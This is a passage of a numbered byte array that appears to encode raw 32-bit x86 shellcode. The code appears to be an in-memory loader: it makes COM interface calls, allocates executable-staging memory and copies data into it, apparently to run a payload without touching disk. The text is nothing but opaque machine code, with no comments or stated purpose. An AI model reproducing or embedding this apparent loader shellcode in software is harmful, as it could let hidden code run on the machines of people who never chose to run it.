214 0x24, 0xf0, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44,
215 0x14, 0x6c, 0x00, 0xff, 0x56, 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c,
216 0x24, 0x68, 0x51, 0x50, 0xff, 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33,
217 0xc9, 0x8b, 0xc1, 0xe9, 0x5b, 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24,
218 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b,
219 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85,
220 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c,
221 0x8b, 0x4e, 0x14, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50,
222 0x08, 0x89, 0x7e, 0x14, 0x8b, 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b,
223 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85,
224 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c,
225 0x8b, 0x4e, 0x08, 0x85, 0xc9, 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50,
226 0x2c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e,
227 0x08, 0x8b, 0x4e, 0x04, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff,
228 0x50, 0x08, 0x89, 0x7e, 0x04, 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b,
229 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44,
230 0x24, 0x04, 0x83, 0xc0, 0x10, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
231 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40,
232 0x00, 0x80, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24,
233 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff, 0x74, 0x24, 0x14,
234 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00, 0xb8, 0x01, 0x40,
235 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24, 0x14, 0x85, 0xff,
236 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16, 0x56, 0x8b, 0x74,
237 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b,
238 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2, 0x10, 0x00, 0x8b,
239 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
240 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x08,
241 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45, 0x08, 0xff, 0x75,
242 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75, 0x1c, 0xff, 0x75,
243 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff, 0x52, 0x2c, 0x5d,
244 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x04, 0x02, 0x00, 0x00,
245 0x53, 0x56, 0x57, 0xe8, 0xa5, 0x15, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0xb9,
246 0xd2, 0x1d, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
247 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x8b, 0x15, 0x00, 0x00, 0xb9, 0x8a,
248 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
249 0xe8, 0x78, 0x15, 0x00, 0x00, 0xb9, 0x5b, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
250 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x65, 0x15, 0x00, 0x00,
251 0xb9, 0xf7, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
252 0x48, 0x0c, 0xe8, 0x52, 0x15, 0x00, 0x00, 0xb9, 0xcd, 0x1a, 0x40, 0x00,
253 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x3f, 0x15,
254 0x00, 0x00, 0xb9, 0xa9, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
255 0x06, 0x89, 0x48, 0x14, 0xe8, 0x2c, 0x15, 0x00, 0x00, 0xb9, 0x11, 0x1b,
256 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
257 0x19, 0x15, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
258 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0x06, 0x15, 0x00, 0x00, 0xb9,
259 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
260 0x20, 0xe8, 0xf3, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
261 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xe0, 0x14, 0x00,
262 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
263 0x89, 0x48, 0x28, 0xe8, 0xcd, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40,
264 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0xba,
265 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
266 0x8b, 0x06, 0x89, 0x48, 0x30, 0xe8, 0xa7, 0x14, 0x00, 0x00, 0xb9, 0x43,
267 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34,
268 0xe8, 0x94, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
269 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x38, 0xe8, 0x81, 0x14, 0x00, 0x00,
270 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
271 0x48, 0x3c, 0xe8, 0x6e, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
272 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x40, 0xe8, 0x5b, 0x14,
273 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
274 0x06, 0x89, 0x48, 0x44, 0xe8, 0x48, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11,
275 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8,
276 0x35, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
277 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x4c, 0xe8, 0x22, 0x14, 0x00, 0x00, 0xb9,
278 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
279 0x50, 0xe8, 0x0f, 0x14, 0x00, 0x00, 0xb9, 0xa1, 0x1a, 0x40, 0x00, 0x2b,
280 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x54, 0xe8, 0xfc, 0x13, 0x00,
281 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
282 0x89, 0x48, 0x58, 0xe8, 0xe9, 0x13, 0x00, 0x00, 0xb9, 0xc5, 0x1a, 0x40,
283 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0xd6,
284 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
285 0x8b, 0x06, 0x89, 0x48, 0x60, 0xe8, 0xc3, 0x13, 0x00, 0x00, 0xb9, 0x6b,
286 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64,
287 0xe8, 0xb0, 0x13, 0x00, 0x00, 0xb9, 0x99, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
288 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x68, 0xe8, 0x9d, 0x13, 0x00, 0x00,
289 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
290 0x48, 0x6c, 0xe8, 0x8a, 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
291 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x70, 0xe8, 0x77, 0x13,
292 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x8b, 0x7d, 0x08,
293 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x74, 0x8d, 0x85, 0xfc, 0xfd, 0xff,
294 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87, 0xe8, 0x05, 0x00, 0x00,
295 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x30, 0x13, 0x00, 0x00, 0x83, 0xc4,
296 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd, 0xff, 0xff, 0x53, 0x50,
297 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b,
298 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0x84, 0x06, 0x00, 0x00, 0x50, 0x8b,
299 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x54,
300 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
301 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xc9, 0x56, 0x8b, 0x74, 0x24,
302 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84, 0x8f, 0xf4, 0x05, 0x00, 0x00,
303 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb,
304 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x04, 0x06, 0x00, 0x00, 0x3b, 0x04,
305 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33,
306 0xc9, 0x8b, 0x84, 0x8f, 0x84, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75,
307 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0x89, 0x32, 0x33, 0xc0, 0xeb,
308 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b,
309 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x6a, 0x00, 0x6a, 0x00, 0x6a,
310 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x38, 0x33, 0xc0,
311 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f,
312 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff,
313 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff, 0x50, 0x4c, 0x33, 0xc0, 0xc2,
314 0x08, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x56,
315 0x8b, 0x75, 0x08, 0x57, 0x81, 0xc6, 0x6c, 0x04, 0x00, 0x00, 0x8a, 0x0e,
316 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x3f, 0x8d, 0x7d, 0x80, 0x8b, 0xd6, 0x2b,
317 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12, 0x3d, 0x80, 0x00, 0x00, 0x00, 0x7d,
318 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9,
319 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46, 0xc6, 0x44, 0x05, 0x80,
320 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8, 0xc3, 0x16, 0x00, 0x00,
321 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f,
322 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x1c, 0x83, 0x7d, 0x0c,
323 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4, 0x50, 0x8b, 0x45, 0x08,
324 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8, 0x1c, 0x75, 0x1d, 0x81,
325 0x7d, 0xf4, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7d, 0xfc, 0x00,
326 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8, 0x04, 0x75, 0x05, 0x33,
327 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3, 0x81, 0xec, 0x10, 0x02,
328 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x18, 0x02, 0x00, 0x00, 0x33, 0xc0,
329 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
330 0x8b, 0x8b, 0xb8, 0x00, 0x00, 0x00, 0x56, 0x57, 0x85, 0xc9, 0x0f, 0x84,
331 0xaa, 0x00, 0x00, 0x00, 0x55, 0x8d, 0x83, 0x24, 0x06, 0x00, 0x00, 0x50,
332 0x8d, 0x83, 0x14, 0x06, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x8b, 0xb4, 0x24,
333 0x28, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x68, 0x8d, 0x44, 0x24, 0x20,
334 0x50, 0x8d, 0x46, 0x0c, 0x50, 0x53, 0xe8, 0x5b, 0x11, 0x00, 0x00, 0x8b,
335 0x55, 0x00, 0x8d, 0x7d, 0x04, 0x83, 0xc4, 0x0c, 0x8d, 0x83, 0x34, 0x06,
336 0x00, 0x00, 0x8b, 0x0a, 0x57, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x52,
337 0xff, 0x51, 0x0c, 0x85, 0xc0, 0x78, 0x34, 0x8b, 0x07, 0x8d, 0x54, 0x24,
338 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x30,
339 0x83, 0x7c, 0x24, 0x14, 0x00, 0x74, 0x25, 0x8b, 0x0f, 0x8d, 0x45, 0x08,
340 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83,
341 0x44, 0x06, 0x00, 0x00, 0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x09, 0x83,
342 0x27, 0x00, 0xeb, 0x04, 0x83, 0x65, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x34,
343 0x8d, 0x45, 0x08, 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8d,
344 0x83, 0x44, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x93,
345 0xb4, 0x00, 0x00, 0x00, 0xeb, 0x07, 0x8b, 0xb4, 0x24, 0x28, 0x02, 0x00,
346 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x83, 0x65, 0x08, 0x00, 0x33, 0xc0, 0xe9,
347 0xfb, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51,
348 0x28, 0x85, 0xc0, 0x0f, 0x88, 0xe6, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
349 0x20, 0x50, 0x8d, 0x86, 0x0c, 0x01, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xa3,
350 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x20, 0x50, 0xff,
351 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8b, 0xf8, 0x8d, 0x45,
352 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0xff, 0x51, 0x30, 0x57,
353 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x85, 0xf6, 0x0f, 0x88,
354 0xa3, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8d, 0x45, 0x10, 0x50, 0x8d,
355 0x83, 0x64, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85,
356 0xc0, 0x0f, 0x88, 0x88, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24, 0x28, 0x02,
357 0x00, 0x00, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00,
358 0x00, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x01,
359 0x6a, 0x11, 0xff, 0x53, 0x6c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x60, 0x8b,
360 0x57, 0x0c, 0x33, 0xc9, 0x39, 0x8e, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
361 0x8a, 0x84, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b,
362 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x8b, 0x4d, 0x10, 0x8d, 0x45,
363 0x14, 0x50, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
364 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24,
365 0x10, 0x8b, 0x47, 0x0c, 0x39, 0x96, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
366 0x88, 0x94, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b,
367 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x57, 0xff, 0x53, 0x78, 0x8b,
368 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x10, 0x02, 0x00,
369 0x00, 0xc3, 0x81, 0xec, 0x3c, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b,
370 0xb4, 0x24, 0x4c, 0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76,
371 0x28, 0xff, 0x76, 0x4c, 0xff, 0x76, 0x48, 0x56, 0xe8, 0xc2, 0x0f, 0x00,
372 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xe8, 0xff, 0x76, 0x28, 0x89, 0x6c, 0x24,
373 0x34, 0xff, 0x76, 0x54, 0xff, 0x76, 0x50, 0x56, 0xe8, 0xaa, 0x0f, 0x00,
374 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0x89, 0x5c, 0x24,
375 0x44, 0xff, 0xb6, 0x8c, 0x01, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x01, 0x00,
376 0x00, 0x56, 0xe8, 0x8c, 0x0f, 0x00, 0x00, 0x83, 0xc4, 0x3c, 0x8b, 0xf8,
377 0x89, 0x7c, 0x24, 0x10, 0x85, 0xed, 0x74, 0x27, 0x85, 0xdb, 0x74, 0x23,
378 0x85, 0xff, 0x74, 0x1f, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff,
379 0x36, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x1a, 0x83,
380 0xbe, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x03, 0x50, 0xff, 0xd7, 0x83,
381 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x3c, 0x01, 0x00, 0x00,
382 0xc3, 0xff, 0x36, 0x56, 0x53, 0xe8, 0xa4, 0x13, 0x00, 0x00, 0x6a, 0x20,
383 0x8d, 0x44, 0x24, 0x38, 0x6a, 0x00, 0x50, 0xe8, 0xba, 0x13, 0x00, 0x00,
384 0x83, 0xc4, 0x18, 0x83, 0xbb, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x49,
385 0x8b, 0x03, 0x2d, 0x40, 0x02, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x40, 0x02,
386 0x00, 0x00, 0x50, 0x8d, 0x43, 0x14, 0x50, 0x8d, 0x43, 0x04, 0x50, 0xe8,
387 0x73, 0x10, 0x00, 0x00, 0xff, 0x73, 0x2c, 0x8d, 0x83, 0xf0, 0x07, 0x00,
388 0x00, 0xff, 0x73, 0x28, 0x50, 0xe8, 0x3c, 0x0f, 0x00, 0x00, 0x83, 0xc4,
389 0x1c, 0x3b, 0x83, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x7d, 0x02, 0x00,
390 0x00, 0x3b, 0x93, 0xf4, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x71, 0x02, 0x00,
391 0x00, 0xff, 0x73, 0x2c, 0xff, 0x73, 0x28, 0xff, 0x73, 0x34, 0xff, 0x73,
392 0x30, 0x53, 0xe8, 0xcc, 0x0e, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x43,
393 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0xff, 0xff, 0xff, 0x8d, 0xb3, 0x44,
394 0x02, 0x00, 0x00, 0x8a, 0x0e, 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x35, 0x8d,
395 0x7c, 0x24, 0x48, 0x8b, 0xd6, 0x2b, 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12,
396 0x3d, 0x04, 0x01, 0x00, 0x00, 0x73, 0x0b, 0x88, 0x0c, 0x3a, 0x40, 0x42,
397 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x12, 0x46, 0xc6,
398 0x44, 0x04, 0x48, 0x00, 0x03, 0xf0, 0x8d, 0x44, 0x24, 0x48, 0x50, 0xff,
399 0x53, 0x30, 0xeb, 0xc3, 0x33, 0xff, 0x47, 0x39, 0xbb, 0x40, 0x02, 0x00,
400 0x00, 0x76, 0x38, 0x8d, 0x6b, 0x34, 0x8d, 0x73, 0x38, 0xff, 0x73, 0x2c,
401 0xff, 0x73, 0x28, 0xff, 0x76, 0x04, 0xff, 0x36, 0x53, 0xe8, 0x59, 0x0e,
402 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84,
403 0xda, 0x01, 0x00, 0x00, 0x47, 0x83, 0xc6, 0x08, 0x83, 0xc5, 0x04, 0x3b,
404 0xbb, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x6c, 0x24, 0x18, 0x8b,
405 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x17, 0x53, 0xe8,
406 0x53, 0xf3, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xad, 0x01, 0x00,
407 0x00, 0x8b, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
408 0x0f, 0x84, 0x9c, 0x01, 0x00, 0x00, 0x8d, 0xb3, 0x20, 0x09, 0x00, 0x00,
409 0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbb, 0x6c,
410 0x05, 0x00, 0x00, 0x01, 0x74, 0x30, 0x53, 0xe8, 0x4f, 0xf1, 0xff, 0xff,
411 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
412 0x0f, 0x84, 0x6c, 0x01, 0x00, 0x00, 0x53, 0xe8, 0x1d, 0xf2, 0xff, 0xff,
413 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
414 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84,
415 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30,
416 0x05, 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x03, 0xc7,
417 0x50, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x27,
418 0x01, 0x00, 0x00, 0x57, 0x56, 0x55, 0xe8, 0xf3, 0x11, 0x00, 0x00, 0x8b,
419 0x46, 0x08, 0x83, 0xc4, 0x0c, 0x83, 0xf8, 0x03, 0x74, 0x2d, 0x83, 0xf8,
420 0x04, 0x74, 0x28, 0x83, 0xf8, 0x05, 0x74, 0x23, 0x83, 0xf8, 0x02, 0x0f,
421 0x85, 0xa2, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x28, 0x05, 0x00, 0x00, 0x50,
422 0x8d, 0x86, 0x28, 0x05, 0x00, 0x00, 0x50, 0xe8, 0xc8, 0x0f, 0x00, 0x00,
423 0x59, 0x59, 0xe9, 0x86, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x20, 0xb9,
424 0x00, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x66, 0x8b,
425 0x46, 0x08, 0x66, 0x48, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff,
426 0x93, 0xe4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xbd, 0x00, 0x00,
427 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24,
428 0x50, 0xff, 0x54, 0x24, 0x28, 0x8b, 0xf8, 0x8d, 0x8e, 0x28, 0x05, 0x00,
429 0x00, 0x57, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0xb6, 0x20, 0x05, 0x00,
430 0x00, 0x66, 0x8b, 0x46, 0x08, 0x51, 0xff, 0xb6, 0x24, 0x05, 0x00, 0x00,
431 0x8d, 0x8d, 0x28, 0x05, 0x00, 0x00, 0x66, 0x48, 0x51, 0xb9, 0x00, 0x01,
432 0x00, 0x00, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff, 0x93, 0xe8,
433 0x00, 0x00, 0x00, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x8b,
434 0xf0, 0xff, 0x54, 0x24, 0x20, 0x85, 0xf6, 0x75, 0x61, 0x8b, 0xf5, 0x83,
435 0x3e, 0x03, 0x74, 0x51, 0x83, 0x3e, 0x04, 0x74, 0x4c, 0x83, 0x3e, 0x01,
436 0x74, 0x18, 0x83, 0x3e, 0x02, 0x74, 0x13, 0x83, 0x3e, 0x05, 0x74, 0x05,
437 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x53, 0xe8, 0x1f, 0x08, 0x00, 0x00,
438 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x56, 0x53, 0xe8, 0xc6, 0xfa,
439 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d, 0x44, 0x24,
440 0x28, 0x50, 0x56, 0x53, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c,
